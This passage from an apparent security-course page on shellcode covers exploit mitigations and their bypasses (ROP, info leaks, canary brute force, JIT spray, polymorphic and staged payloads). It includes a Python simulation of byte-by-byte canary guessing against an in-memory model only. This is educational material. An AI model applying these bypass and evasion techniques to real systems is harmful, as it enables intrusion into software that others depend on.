DEP/NX	Data pages marked non-executable	Injected shellcode cannot run	ROP chains, ret2libc, calling mprotect
ASLR	Randomize library/stack addresses	Cannot predict where to return	Info leak, partial overwrite, brute force
Stack Canaries	Secret value before return address	Overflow detected before RET	Info leak canary, format string
CFI	Control flow integrity checks	Invalid jump targets blocked	CFI-compliant gadgets, fine-grained attacks
Sandboxing	Restrict available syscalls	Shellcode functionality limited	Use allowed syscalls, sandbox escape

Adaptation Strategies

•ROP for DEP Bypass — Instead of executing injected code, chain existing code fragments ('gadgets') that end in RET. With enough gadgets this is Turing-complete. Covered on the next page.
•Information Leaks for ASLR Bypass — Use a separate vulnerability to read memory and reveal a library address. Because offsets within a module are fixed, a single leaked pointer is enough to compute every other address the exploit chain needs in that module.
•Canary Brute Force — On fork-based servers, each child inherits the parent's canary and a crashing child doesn't take down the parent, so the canary can be guessed one byte at a time.
•JIT Spray — Coerce a JIT compiler into emitting attacker-chosen byte sequences (for example, as constants in generated code) into memory it marks executable. This worked against JavaScript engines before JIT hardening was introduced.
•Data-Only Attacks — Corrupt application data without changing control flow. This sidesteps DEP and CFI while still achieving the desired outcome.
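
The canary brute-force item is easier to appreciate with numbers. The following sketch models the attack against a purely in-memory oracle, assuming an 8-byte canary whose lowest byte is a fixed NUL (as glibc does on x86-64 Linux). `make_oracle` and `recover` are hypothetical names, and no real process is involved.

```python
import os

CANARY_SIZE = 8            # bytes on x86-64
KNOWN_PREFIX = b"\x00"     # assumption: the lowest canary byte is always NUL

def make_oracle(canary: bytes):
    """Model of 'did the forked child survive?': True if the guessed bytes match."""
    def survives(prefix: bytes) -> bool:
        return canary.startswith(prefix)
    return survives

def recover(survives, known: bytes = KNOWN_PREFIX, size: int = CANARY_SIZE):
    """Guess one byte at a time, keeping each byte that lets the child survive."""
    attempts = 0
    while len(known) < size:
        for guess in range(256):
            attempts += 1
            if survives(known + bytes([guess])):
                known += bytes([guess])
                break
    return known, attempts

secret = KNOWN_PREFIX + os.urandom(CANARY_SIZE - len(KNOWN_PREFIX))
found, attempts = recover(make_oracle(secret))

unknown = CANARY_SIZE - len(KNOWN_PREFIX)
print(f"blind guessing, worst case : {256 ** unknown:,} attempts")
print(f"byte-by-byte, worst case   : {256 * unknown:,} attempts")
print(f"byte-by-byte, this run     : {attempts:,} attempts")
```

The gap between the first two figures is why servers that re-randomize the canary per connection, or re-execute instead of only forking, remove this attack.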

The Arms Race Continues

Summary: Mastering Code Injection

We've explored the art and science of shellcode development—from fundamental position-independent code to advanced polymorphic and staged payloads. Let's consolidate the key insights.

Key Takeaways

•Shellcode must be position-independent — JMP-CALL-POP, stack-based strings, and RIP-relative addressing enable code that runs anywhere in memory.
•System calls are the shellcode's interface to the kernel — Understanding syscall mechanics enables arbitrary actions: spawning shells, network connections, file operations.
•Bad characters require encoding — XOR encoding with decoder stubs bypasses byte filters; alphanumeric encoders handle the most restrictive contexts.
•Polymorphism defeats signatures — Varying encoding keys, instruction selection, and junk insertion makes each payload unique.
•Staged payloads overcome size limits — Tiny stagers fetch full payloads over network; egghunters locate large payloads in memory.
•Modern defenses require adaptation — DEP, ASLR, and CFI don't eliminate exploitation but shift techniques toward ROP, info leaks, and multi-stage exploit chains.

What's Next: Return-Oriented Programming
